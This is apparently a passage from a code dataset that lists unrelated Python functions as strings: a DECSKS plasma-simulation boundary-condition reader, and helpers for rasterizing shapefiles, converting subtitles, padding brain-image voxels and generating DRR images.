specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['upper'].upper())\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['f'][var]['upper'].upper())\n print \"e.g. 
periodic boundaries on phi require periodic boundaries on f for the same variable\\n\"\n raise InputError('PERIODIC boundary conditions on were specifed consistently for phi in params_boundaryconditions.dat; however, periodic boundary conditions must also be consistently specified on the distribution function. Revisit params_boundaryconditions.dat and ensure that both lower and upper boundaries on the distribution function f and the potential phi are set to PERIODIC if a periodic plasma is intended to be simulated.')\n elif BC['f'][var]['type'] == 'periodic': # note that validity and consistency checks on inputs for the distribution function have already been done above\n pass\n\n\n # CHECK FOR CONSISTENCY ON PHI BCS WITH HIGH ORDER CORRECTION METHOD SPECIFIED (note we have already checked this against the distribution function BCs)\n # here, we are only checking to see if that BCs on phi aren't periodic, to ensure that HOC is NOT set to fourier (relies on periodicity))\n # the following conditional check asks: \"if (BCs on phi are not periodic) AND (HOC is FOURIER)\"\n if ((BC['phi'][var]['lower'] == 'PERIODIC' and BC['phi'][var]['upper'] != 'PERIODIC') or (BC['phi'][var]['lower'] != 'PERIODIC' and BC['phi'][var]['upper'] == 'PERIODIC')) and HOC[var] == 'fourier':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent with the specified high order correction method in params.dat: \\n\\n\"\n print \"lower boundary condition on phi for variable %s: %s\" % (var, BC['phi'][var]['lower'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\\n\" % (var, BC['phi'][var]['upper'].upper())\n print \"upper boundary condition on phi for variable %s: %s\\n\\n\" % (var, HOC[var].upper())\n print \"\\n\\nFourier high order corrections require periodic boundary conditions on both phi and the distribution function f\\n\"\n\n raise InputError('the high order correction is specified as FOURIER; however, the BCs on the electric potential phi are not periodic. FOURIER corrections require PERIODIC BCs on phi and the distribution function as the methods rely on periodicity')\n\n #--------------------------------------------------------------------------------------------#\n # BIAS values\n #--------------------------------------------------------------------------------------------#\n\n Bias = {} # this dictionary is created for reading in the bias values, it is not returned\n # in sim_params dict. 
If a bias condition is set on any boundary, this dictionary\n # assigns its value at that boundary in the vector phi_BC[var], phi_BC[var] is\n # returned (as usual, var = ['x', 'y', 'z'])\n\n Bias['x'] = {}\n Bias['y'] = {}\n Bias['z'] = {}\n\n Bias['x']['lower'] = safe_eval(BC_infile_lines[214][BC_infile_lines[214].find('=')+1:].strip())\n Bias['x']['upper'] = safe_eval(BC_infile_lines[215][BC_infile_lines[215].find('=')+1:].strip())\n Bias['y']['lower'] = safe_eval(BC_infile_lines[217][BC_infile_lines[217].find('=')+1:].strip())\n Bias['y']['upper'] = safe_eval(BC_infile_lines[218][BC_infile_lines[218].find('=')+1:].strip())\n Bias['z']['lower'] = safe_eval(BC_infile_lines[220][BC_infile_lines[220].find('=')+1:].strip())\n Bias['z']['upper'] = safe_eval(BC_infile_lines[221][BC_infile_lines[221].find('=')+1:].strip())\n\n # check for valid inputs on active variables for any boundary that is specified as BIAS\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n if HOC[var] == 'FOURIER':\n pass\n else:\n for boundary in ['lower', 'upper']:\n if var in phasespace_vars:\n if BC['phi'][var][boundary] == 'BIAS':\n if Bias[var][boundary] is None: # if the BC is BIAS but the value input for the BIAS value is None\n print \"\\nThe following specifications in params_boundaryconditions.dat are inconsistent:\\n\"\n print \"%s boundary condition on phi for variable %s: %s\" % (boundary, var, BC['phi'][var][boundary].upper())\n print \"%s BIAS value on phi for variable %s: %s\\n\" % (boundary, var, Bias[var][boundary])\n print \"e.g. if a boundary condition on phi is set to BIAS for a variable, a number must be specifed under BIAS value\\n\"\n raise InputError('A phi boundary condition on an active variable (number of grid points on this variable has been set as non-None) has been specified as BIAS; however, the corresponding BIAS value is NoneType. Must be a number.')\n elif type(Bias[var][boundary]) == str:\n print \"\\nThe following specifications in params_boundaryconditions.dat are inconsistent:\\n\"\n print \"%s boundary condition on phi for variable %s: %s\" % (boundary, var, BC['phi'][var][boundary].upper())\n print \"%s BIAS value on phi for variable %s: %s\\n\" % (boundary, var, Bias[var][boundary])\n print \"e.g. if a boundary condition on phi is set to BIAS for a variable, a number must be specifed under BIAS value\\n\"\n\n raise InputError('A phi boundary condition on an active variable (number of grid points on this variable has been set as non-None) has been specified as BIAS; however, the corresponding BIAS value is str type. 
Must be a number.')\n else:\n pass\n\n # E is calculated by the following call flow, first an ORCHESTRATOR is called:\n #\n # E = lib.fieldsolvers.compute_electric_field_fourier <--- solves with a Gauss' law solver directly\n #\n # or\n #\n # E = lib.fieldsolvers.compute_electric_field_fd <--- solves a Poisson solver for phi, then differentiate to get E\n #\n # which can generally be called by eval operating on string handles that are themselves constructed\n # per 'lib.fieldsolvers.compute_electric_field_' + HOC[var].lower()\n #\n # If a finite difference routine is specified, a Poisson solve must be performed to obtain phi.\n # We call the relevant Poisson solver among the following options (L = lower boundary, U = upper boundary, DBC = Dirichlet BC, NBC = Neumann BC):\n #\n # Poisson_6th_PBC\n # Poisson_6th_LDBC_UDBC\n # Poisson_6th_LDBC_UNBC\n # Poisson_6th_LNBC_UDBC\n # Poisson_6th_LDBC_LDBC\n # Poisson_6th_UDBC_UNBC\n #\n\n # which are selected based on the boundary conditions the user has supplied in params_boundaryconditions.dat.\n #\n # finally, we compute and return:\n #\n # E = - 1 / config_var.width * W_dn1_LTE6.dot(phi)\n #\n\n # --------------------------------------------------------------------------\n # fieldsolver orchestator handle string for electric field (periodic or non-periodic)\n #\n # currently only 1D1V, only one handle needed. When this will be generalized, can make a dict object with keys corresponding\n # to each active configuration variable\n\n compute_electric_field_orchestrator_handle = {}\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n # dictionary key labels the component of the electric field: 'x', 'y', 'z'\n compute_electric_field_orchestrator_handle[var] = \"DECSKS.lib.fieldsolvers.compute_electric_field_\" + HOC[var].lower()\n\n\n # ---------------------------------------------------------------------\n # initialize dictionaries for wall charge objects\n\n sigma = {}\n sigma_n = {}\n\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n sigma_n[var] = {}\n sigma[var] = {}\n\n # --------------------------------------------------------------------------\n # Dictionary for the specific electric potential phi function solver needed\n # according to the specified boundary conditions on phi\n\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n\n if HOC[var] == 'FOURIER':\n pass # uses electric field E, periodic boundary conditions only\n\n else: # is FD corrections, and electric potential phi in a Poisson solver, can be periodic or other BCs\n BC['phi'][var]['type'] = BC['phi'][var]['lower'] + '_' + BC['phi'][var]['upper']\n if BC['phi'][var]['type'] == 'PERIODIC_PERIODIC':\n BC['phi'][var]['type'] = 'PBC'\n\n if BC['f'][var]['lower'] != 'periodic' and BC['f'][var]['upper'] != 'periodic':\n raise InputError('A boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n\n if BC['phi'][var]['type'] == 'BIAS_BIAS':\n BC['phi'][var]['type'] = 'LDBC_UDBC'\n\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][0] = float(Bias[var]['lower'])\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][-1] = float(Bias[var]['upper'])\n\n if BC['f'][var]['lower'] != 'absorbing' or BC['f'][var]['upper'] != 'absorbing': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n raise InputError('A boundary condition on phi was specified as BIAS; however, the 
corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n elif BC['phi'][var]['type'] == 'BIAS_SELF-CONSISTENT':\n BC['phi'][var]['type'] = 'LDBC_UNBC'\n\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][0] = float(Bias[var]['lower'])\n # Neumann condition, dphi = sigma_upper, translates to phi_BC[-1] = -6 var.width * sigma_upper (see https://github.com/dsirajud/IPython-notebooks/DECSKS-04...ipynb for details)\n # phi_BC[-1] = - 6 * var.width * sim_params['sigma'][var]['upper'], changes with time step\n\n if BC['f'][var]['lower'] != 'absorbing': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n raise InputError('A lower boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n if BC['f'][var]['upper'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities, sigma for the collector (f) /self-consistent (phi) conditions\n sigma[var]['upper'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['upper'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['upper'].upper())\n print \"upper boundary condition on f for variable %s: %s\\n\" % (var, BC['f'][var]['upper'].upper())\n print \"\\ne.g. an upper boundary condition on phi as SELF-CONSISTENT must have the upper boundary condition on f as COLLECTOR\"\n print \"\\ne.g. an upper boundary condition on f as ASBORBING must have the upper boundary condition on phi as BIAS\\n\"\n\n raise InputError('An upper boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector)')\n\n elif BC['phi'][var]['type'] == 'SELF-CONSISTENT_BIAS':\n BC['phi'][var]['type'] = 'LNBC_UDBC'\n\n # Neumann condition, dphi = -sigma_lower, translates to phi_BC[0] = -6 var.width * sigma_lower (see https://github.com/dsirajud/IPython-notebooks/DECSKS-04...ipynb for details)\n #phi_BC[var][0] = - 6 * var.width * sim_params['sigma'][var]['lower'], changes with time step\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][-1] = float(Bias[var]['upper'])\n\n # check upper boundary\n if BC['f'][var]['upper'] == 'absorbing': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n pass\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi for variable %s: %s\\n\" % (var, BC['phi'][var]['upper'].upper())\n print \"upper boundary condition on f for variable %s: %s\\n\\n\" % (var, BC['f'][var]['upper'].upper())\n print \"\\ne.g. 
an upper boundary condition set on phi as BIAS must have the upper boundary condition on f as ABSORBING\\n\"\n\n raise InputError('An upper boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n # check lower boundary\n if BC['f'][var]['lower'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities, sigma for the collector (f) /self-consistent (phi) conditions\n sigma[var]['lower'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['lower'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi: %s\" % BC['phi'][var]['lower'].upper()\n print \"lower boundary condition on f: %s\\n\" % BC['f'][var]['lower'].upper()\n print \"\\ne.g. an lower boundary condition set on phi as SELF-CONSISTENT must have the lower boundary condition on f as COLLECTOR\"\n print \"e.g. an lower boundary condition set on f as ABSORBING must have the lower boundary condition on phi as BIAS\"\n print \"e.g. an lower boundary condition set on f as PERIODIC requires the upper boundary on f to be PERIODIC as well as both lower and upper boundary conditions on phi to be set to PERIODIC\\n\"\n raise InputError('A lower boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector if self-consistent boundary potentials are desired). Equivalently, phi is not compatible with f (e.g. if periodic boundaries on f were desired, the potential must also be periodic)')\n\n elif BC['phi'][var]['type'] == 'SYMMETRIC_BIAS' or BC['phi'][var]['type'] == 'SYMMETRY_BIAS':\n BC['phi'][var]['type'] = 'LNBC_UDBC'\n\n # Neumann condition, dphi = 0 for symmetry\n phi_BC[var][0] = 0.\n # Dirichlet condition, phi = BIAS value\n phi_BC[var][-1] = float(Bias[var]['upper'])\n\n if BC['f'][var]['upper'] != 'absorbing': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi: %s\" % BC['phi'][var]['upper'].upper()\n print \"upper boundary condition on f: %s\\n\\n\" % BC['f'][var]['upper'].upper()\n print \"\\ne.g. an upper boundary condition set on phi as BIAS must have the upper boundary condition on f as ABSORBING\\n \"\n raise InputError('An upper boundary condition on phi was specified as BIAS; however, the corresponding boundary condition on f is not compatible (must be set to absorbing or equivalent synonym)')\n\n\n elif BC['phi'][var]['type'] == 'SYMMETRIC_SELF-CONSISTENT' or BC['phi'][var]['type'] == 'SYMMETRY_SELF-CONSISTENT':\n BC['phi'][var]['type'] = 'LDBC_LNBC'\n\n # We default to a LDBC_LNBC solver, both boundary conditions on left edge, entries 0 (Dirichlet) and 1 (Neumann)\n # cf. DECSKS-04 notebook for more details:\n #\n # https://github.com/dsirajud/IPython-notebooks/DECSKS-04...ipynb\n #\n # Dirichlet condition, set reference potential phi = 0\n phi_BC[var][0] = 0. 
# reference potential set to zero\n # Neumann condition, dphi = 0 for symmetry\n phi_BC[var][1] = 0.\n\n\n if BC['f'][var]['upper'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities, sigma for the collector (f) /self-consistent (phi) conditions\n # By virtue of the setup, the above enforcements on the lower boundary ensures this unenforced upper Neumann BC is\n # satisfied automatically given the relationship that Neumann BCs are fixed by due to the Poisson equation\n #\n # see github.com/dsirajud/IPython-Notebooks/DECSKS-04 for more information (final few sections of the notebook)\n #\n # Thus, we do not need to actually enforce the wall potential directly in terms of the charge accumulated for this boundary; however,\n # we initialize and track the objects here so that the data can be accessed, analyzed or otherwise plotted, should the user wish\n sigma[var]['upper'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['upper'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi: %s\" % BC['phi'][var]['upper'].upper()\n print \"upper boundary condition on f: %s\\n\\n\" % BC['f'][var]['upper'].upper()\n print \"\\ne.g. an upper boundary condition set on phi as SELF-CONSISTENT must have the upper boundary condition on f as COLLECTOR\\n \"\n\n raise InputError('An upper boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector)')\n\n elif BC['phi'][var]['type'] == 'SELF-CONSISTENT_SELF-CONSISTENT':\n BC['phi'][var]['type'] = 'LDBC_LNBC'\n\n # We default to a LDBC_LNBC solver, both boundary conditions on left edge, entries 0 (Dirichlet) and 1 (Neumann)\n # cf. DECSKS-04 notebook for more details:\n #\n # https://github.com/dsirajud/IPython-notebooks/DECSKS-04...ipynb\n #\n # Dirichlet condition, set reference potential phi = 0\n phi_BC[var][0] = 0. # reference potential set to zero\n # Neumann condition, dphi = 0 for symmetry\n #phi_BC[var][1] = - 6 * var.width * sim_params['sigma'][var]['lower'], changes with time step\n\n\n if BC['f'][var]['lower'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities\n sigma[var]['lower'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['lower'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"lower boundary condition on phi on variable %s: SELF-CONSISTENT\" % var\n print \"lower boundary condition on f on variable %s: %s\\n\\n\" % (var, BC['f'][var]['lower'].upper())\n print \"\\ne.g. 
a lower boundary condition set on phi as SELF-CONSISTENT must have the lower boundary condition on f as COLLECTOR\\n \"\n\n raise InputError('A lower boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector)')\n\n if BC['f'][var]['upper'] == 'collector': # all synonyms for 'absorbing' (except 'collector') have been seen by this point, and if encountered changed to 'absorbing'\n # initialize wall charge densities, sigma for the collector (f) /self-consistent (phi) conditions\n # By virtue of the setup, the above enforcements on the lower boundary ensures this unenforced upper Neumann BC is\n # satisfied automatically given the relationship that Neumann BCs are fixed by due to the Poisson equation\n #\n # see github.com/dsirajud/IPython-Notebooks/DECSKS-04 for more information (final few sections of the notebook)\n #\n # Thus, we do not need to actually enforce the wall potential directly in terms of the charge accumulated for this boundary; however,\n # we initialize and track the objects here so that the data can be accessed, analyzed or otherwise plotted, should the user wish\n sigma[var]['upper'] = 0 # initialize to zero charge at time zero\n sigma_n[var]['upper'] = np.zeros(Nt + 1) # this was put in at one point for plotting wall charge vs. time\n else:\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat are inconsistent together:\\n\\n\"\n print \"upper boundary condition on phi: SELF-CONSISTENT\"\n print \"upper boundary condition on f: %s\\n\\n\" % BC['f'][var]['upper'].upper()\n print \"\\ne.g an upper boundary condition set on phi as SELF-CONSISTENT must have the upper boundary condition on f as COLLECTOR\\n \"\n\n raise InputError('An upper boundary condition on phi was specified as SELF-CONSISTENT; however, the corresponding boundary condition on f is not compatible (must be set to collector)')\n\n # else: boundary conditions have already been checked for valid inputs, no invalid input will be encountered\n\n # --------------------------------------------------------------------------\n # ELECTRIC POTENTIAL PHI FUNCTION HANDLE STRING and BOUNDARY CONDITION TYPE FUNCTION HANDLE STRING\n #\n # currently only 1D1V, only one handle needed. 
When this will be generalized, can make a dict objects with keys corresponding\n # to each active configuration variable\n #\n # The forms of each string call their associated method per the boundary conditions specified by the user in params_boundaryconditions.dat,\n # based on the boundary conditions specified by the user, one of the following will be created:\n #\n # compute_electric_potential_phi_handle[var] =\n #\n # DECSKS.lib.fieldsolvers.Poisson_6th_PBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_LDBC_UDBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_LDBC_UNBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_LNBC_UDBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_LDBC_LNBC\n # DECSKS.lib.fieldsolvers.Poisson_6th_UDBC_UNBC (<-- available, but not used in any current combination of BCs)\n #\n #\n # and, one of the following\n #\n # distribution_function_boundarycondition_handle[var]['lower'] =\n #\n # DECSKS.lib.boundaryconditions.absorbing_lower_boundary\n # DECSKS.lib.boundaryconditions.collector_lower_boundary\n # DECSKS.lib.boundaryconditions.symmetric_lower_boundary\n #\n # NOTE: if 'periodic' has been specified, everything is\n # handled in the orchestrator, distribution_function_boundarycondition_orchestrator\n # which would take on the string value = 'DECSKS.lib.boundaryconditions.periodic\n\n\n distribution_function_boundarycondition_prefix = 'DECSKS.lib.boundaryconditions'\n distribution_function_boundarycondition_handle = {}\n for var in phasespace_vars:\n if BC['f'][var]['type'] == 'periodic':\n pass\n else:\n distribution_function_boundarycondition_handle[var] = {}\n\n distribution_function_boundarycondition_handle[var]['lower'] = \".\".join((distribution_function_boundarycondition_prefix, BC['f'][var]['lower']))\n distribution_function_boundarycondition_handle[var]['lower'] = \"_\".join((distribution_function_boundarycondition_handle[var]['lower'], 'lower_boundary'))\n\n distribution_function_boundarycondition_handle[var]['upper'] = \".\".join((distribution_function_boundarycondition_prefix, BC['f'][var]['upper']))\n distribution_function_boundarycondition_handle[var]['upper'] = \"_\".join((distribution_function_boundarycondition_handle[var]['upper'], 'upper_boundary'))\n\n\n compute_electric_potential_phi_handle = {}\n compute_electric_potential_phi_prefix = \"DECSKS.lib.fieldsolvers.Poisson_6th_\"\n for var in ['x', 'y', 'z']:\n if var in phasespace_vars:\n if HOC[var] == 'FOURIER': # uses a Gauss law solver to find E directly, which is called by the orchestrator on the fieldsolver\n pass\n else: # computes the electric field E by differentiating phi in an orchestrator fieldsolver function (string handle constructed above)\n # inside the orchestrator, a particular Poisson solver is called according with the boundary conditions indicated in params_boundaryconditions.dat\n compute_electric_potential_phi_handle[var] = compute_electric_potential_phi_prefix + BC['phi'][var]['type']\n else:\n pass\n\n # in the future, can generalize this to multiple dimensions by making this a dict with keys ['x', 'y', 'z']\n # currently just on 1D1V and expecting an 'x' variable to be evolved in configuration\n\n if 'x' not in phasespace_vars:\n raise NotImplementedError('Current 1D1V version of DECSKS is expecting x to be the active configuration variable. 
Please revise the intended simulation so that x is the symbol chosen in params.dat.')\n else:\n if HOC['x'] == 'FOURIER': # uses a Gauss solver to find E directly\n Poisson_6th_order_FD_solver_matrices = None\n\n else: # uses a Poisson solver to find phi, then differentiates to obtain E\n Poisson_6th_order_FD_solver_matrices = assemble_Poisson_6th_order_FD_solver_matrices(Nx_active, BC)\n\n derivative_method = {}\n derivative_method_prefix = 'DECSKS.lib.derivatives'\n for var in phasespace_vars:\n derivative_method[var] = \".\".join((derivative_method_prefix, HOC[var].lower()))\n\n sim_params = dict(\n N = N, HOC = HOC,\n derivative_method = derivative_method,\n Nx = Nx, ax = ax, bx = bx,\n Ny = Ny, ay = ay, by = by,\n Nz = Nz, az = az, bz = bz,\n Nvx = Nvx, avx = avx, bvx = bvx,\n Nvy = Nvy, avy = avy, bvy = bvy,\n Nvz = Nvz, avz = avz, bvz = bvz,\n Nt = Nt, T = T,\n phasespace_vars = phasespace_vars,\n numdims = numdims,\n active_dims = active_dims,\n total_dims = total_dims,\n density = density,\n mu = mu,\n split_scheme = split_scheme,\n splitting = splitting,\n plot_params = plot_params,\n record_outputs = record_outputs,\n outfiles = outfiles,\n BC = BC, # boundary condition types on all phase space variables on distribution function f and phi\n phi_BC = phi_BC, # dictionary containing boundary value vector for electric potential used in Poisson solve, e.g. phi_BC['x']\n sigma = sigma,\n sigma_n = sigma_n, # this was put in for charge history plots\n distribution_function_boundarycondition_handle = distribution_function_boundarycondition_handle, # dictionary with keys (var in phasespace_vars), which are keys to a subdict with keys 'lower', 'upper'\n distribution_function_boundarycondition_orchestrator_handle = distribution_function_boundarycondition_orchestrator_handle, # dictionary with keys (var in phasespace_vars)\n compute_electric_potential_phi_handle = compute_electric_potential_phi_handle,\n compute_electric_field_orchestrator_handle = compute_electric_field_orchestrator_handle,\n I_alternating = I_alternating, # identity matrix with alternating signs according to row, used in computing correctors c\n A_matrix = A_matrix, # Matrices of Bernoulli numbers for HOC\n W = W,\n W_dn1_LTE6 = W_dn1_LTE6,\n Xi = Xi, # spectral differentiation operator matrix (1j*xi[i,j]) ** q\n xi = xi, # wave number vector\n Poisson_6th_order_FD_solver_matrices = Poisson_6th_order_FD_solver_matrices\n )\n\n infile.close()\n\n # --------------------------------------------------------------------------\n # Before return, broadcast notification\n # regarding start of simulation and order of solver\n\n print \"\\nStarting 1D1V Vlasov-Poisson simulation\"\n print \"\\nadvection solver: LTE order %d\" % (N+1)\n print \"\\nwill step through %d-dimensional solution in variables: %s\\n\" % (len(phasespace_vars), phasespace_vars)\n for var in phasespace_vars:\n print \"high order correction method on %s: %s\" % (var, HOC[var])\n\n print \"\\n\"\n return sim_params", "def shapefileToRaster(in_shapefile, model_raster, out_dir, name_override=None, zone_field:str = None, dtype = None, *args, **kwargs) -> str:\n\t# correct variable names\n\tshapefile_path = in_shapefile\n\t# get out_path\n\tif name_override:\n\t\tout_path = os.path.join(out_dir,name_override)\n\telse:\n\t\tin_base = os.path.splitext(os.path.basename(in_shapefile))[0]\n\t\tmodel_ext = os.path.splitext(model_raster)[1]\n\t\tout_path= os.path.join(out_dir,in_base+\"_RASTER\"+model_ext)\n\t# read file\n\tshp = gpd.read_file(shapefile_path)\n\twith 
rasterio.open(model_raster,'r') as rst:\n\t\tmeta = rst.meta.copy()\n\n\t# this is where we create a generator of geom, value pairs to use in rasterizing\n\tif zone_field is not None:\n\t\tzone_vals = []\n\t\tfor i in range(len(shp)):\n\t\t\tzone_vals.append(shp.at[i,zone_field])\n\t\tzone_codes = [i for i, val in enumerate(zone_vals)]\n\t\tshapes = ((geom,val) for geom, val in zip(shp.geometry,zone_codes))\n\telse:\n\t\tshapes = ((geom,1) for geom in shp.geometry)\n\n\t# set data type\n\tif dtype:\n\t\tmeta.update(dtype=dtype)\n\telif zone_field:\n\t\tmeta.update(dtype=rasterio.dtypes.get_minimum_dtype(zone_codes))\n\telse:\n\t\tmeta.update(dtype=\"int16\")\n\n\ttry:\n\t\tout = rasterio.open(out_path, 'w+', **meta)\n\t# merra-2 files have a very high nodata value, beyond the range of int32.\n\t# This block catches the resulting ValueError and swaps in the minimum\n\t# allowable data type. Nice of rasterio to have such a function.\n\texcept ValueError:\n\t\tmeta.update(dtype=rasterio.dtypes.get_minimum_dtype([meta['nodata']]))\n\t\tout = rasterio.open(out_path, 'w+', **meta)\n\t\tout_arr = out.read(1)\n\t\tburned = features.rasterize(shapes=shapes, fill=0, out=out_arr, transform=out.transform)\n\t\tout.write_band(1, burned)\n\tout.close()\n\n\treturn out_path", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n\n conn = sqlite3.connect('../raw/td_V2.db')\n git_commits = pd.read_sql_query(\"SELECT * FROM GIT_COMMITS\",conn)\n szz_fault_inducing_commits = pd.read_sql_query(\"SELECT * FROM szz_fault_inducing_commits\",conn)\n refactoring_miner = pd.read_sql_query(\"SELECT * FROM refactoring_miner\",conn)\n refactoring_miner = refactoring_miner[refactoring_miner[\"COMMIT_HASH\"].isin(git_commits[\"COMMIT_HASH\"])]\n git_commits_changes = pd.read_sql_query(\"SELECT * FROM GIT_COMMITS_CHANGES\", conn)\n git_commits_changes = git_commits_changes[git_commits_changes[\"COMMIT_HASH\"].isin(refactoring_miner[\"COMMIT_HASH\"])]\n\n preprocess(git_commits, szz_fault_inducing_commits, refactoring_miner, git_commits_changes)", "def create_sample_vectors(cleaned_data_directory, out_vectors_path):\n vectors = []\n\n for filename in os.listdir(cleaned_data_directory):\n if not filename.endswith(\".txt\"):\n continue\n\n path = os.path.join(cleaned_data_directory, filename)\n f = open(path, mode='r', encoding='utf8')\n\n print(\"Processing\", path)\n\n lang = filename[:2]\n lang_number = language_codes.index(lang)\n\n print(f\"\\tLanguage: {lang} ({lang_number})\")\n print(\"\\tReading...\", end=' ')\n\n file_content = f.read()\n content_length = len(file_content)\n\n print(\"done.\")\n print(\"\\tExtracting vectors...\", end=' ')\n\n sample_start_index = 0\n count = 0\n\n while sample_start_index + text_sample_size < content_length:\n sample = get_sample(file_content, sample_start_index, text_sample_size)\n input_vector = build_input_vector(sample)\n vector = input_vector + [lang_number]\n vectors.append(vector)\n sample_start_index += text_sample_size\n count += 1\n\n print(\"done.\")\n print(f\"\\tExtracted {count} vectors.\")\n\n del file_content\n\n print(f\"Total {len(vectors)} vectors.\")\n\n np_vectors = np.array(vectors, dtype=np.uint16)\n np.random.shuffle(np_vectors)\n\n print(f\"Converted to NumPy array, shape: {np_vectors.shape}.\")\n\n np.savez_compressed(out_vectors_path, data=np_vectors)\n\n print(f\"Saved to {out_vectors_path}.\")", "def vtt_to_srt(str_name_file: str):\n file_contents: str = 
read_text_file(str_name_file)\n str_data: str = \"\"\n str_data = str_data + convert_content(file_contents)\n str_name_file: str = str_name_file.replace(\".vtt\", \".srt\")\n print(str_name_file)\n file_create(str_name_file, str_data)", "def make_voxels_isometric(input_file):\n import os\n import nibabel as nb\n from mindboggle.utils.utils import execute\n\n # Load image volume\n img = nb.load(input_file)\n lenx, leny, lenz = img.shape\n if lenx != leny or lenx != lenz or leny != lenz:\n\n # Pad smaller dimensions\n max_dim = max([lenx, leny, lenz])\n padx = max_dim - lenx\n pady = max_dim - leny\n padz = max_dim - lenz\n\n # Save padded output\n out_file = 'isometric_' + os.path.basename(input_file)\n pad_dims = '{0}x{1}x{2}vox'.format(padx, pady, padz)\n cmd = ['c3d', input_file, '-pad 0x0x0vox', pad_dims, '-o ', out_file]\n execute(cmd)\n\n # Resample output\n max_dims = '{0}x{1}x{2}'.format(max_dim, max_dim, max_dim)\n cmd = ['c3d', out_file, '-resample', max_dims, '-o ', out_file]\n execute(cmd)\n\n else:\n out_file = input_file\n\n return out_file", "def drr(input_filename,output_directory,calibration_files,output_extension,threshold,min_out,max_out,default_pixel_value,rot,t,cor,n_cam,res,size,transformed_vol,verbose):\n \n click.echo(' inputFileName : {}'.format(input_filename))\n click.echo(' out_directory : {}'.format(output_directory))\n click.echo(' outputExtension : {}'.format(output_extension))\n click.echo(' Verbose Status : {}'.format(verbose))\n click.echo(' Pixel Size : {}'.format(res))\n click.echo(' Output image Size : {}'.format(size))\n click.echo(' Translation : {}'.format(t))\n click.echo(' Rotation : {}'.format(rot))\n click.echo(' Centre of Rotation : {}'.format(cor))\n click.echo(' Threshold : {}'.format(threshold))\n click.echo(' Number of Cameras : {}'.format(n_cam)) \n click.echo(' Minimum Out : {}'.format(min_out))\n click.echo(' Maximum Out : {}'.format(max_out))\n click.echo(' Calibration Files : {}'.format(calibration_files)) \n \n if len(calibration_files) != n_cam :\n raise Exception('Number of Calibration files', len(calibration_files),'do not correspond with the number of Cameras',n_cam)\n \n #%%------------------ Starting the main body of the code ---------------- \n # -------------------- Reader -------------------------\n InputPixelType = itk.ctype(\"short\")\n OutputPixelType = itk.ctype(\"short\")\n ScalarType = itk.D\n DimensionIn = 3\n DimensionOut = 3\n \n InputImageType = itk.Image[InputPixelType , DimensionIn ]\n OutputImageType = itk.Image[OutputPixelType, DimensionOut]\n \n 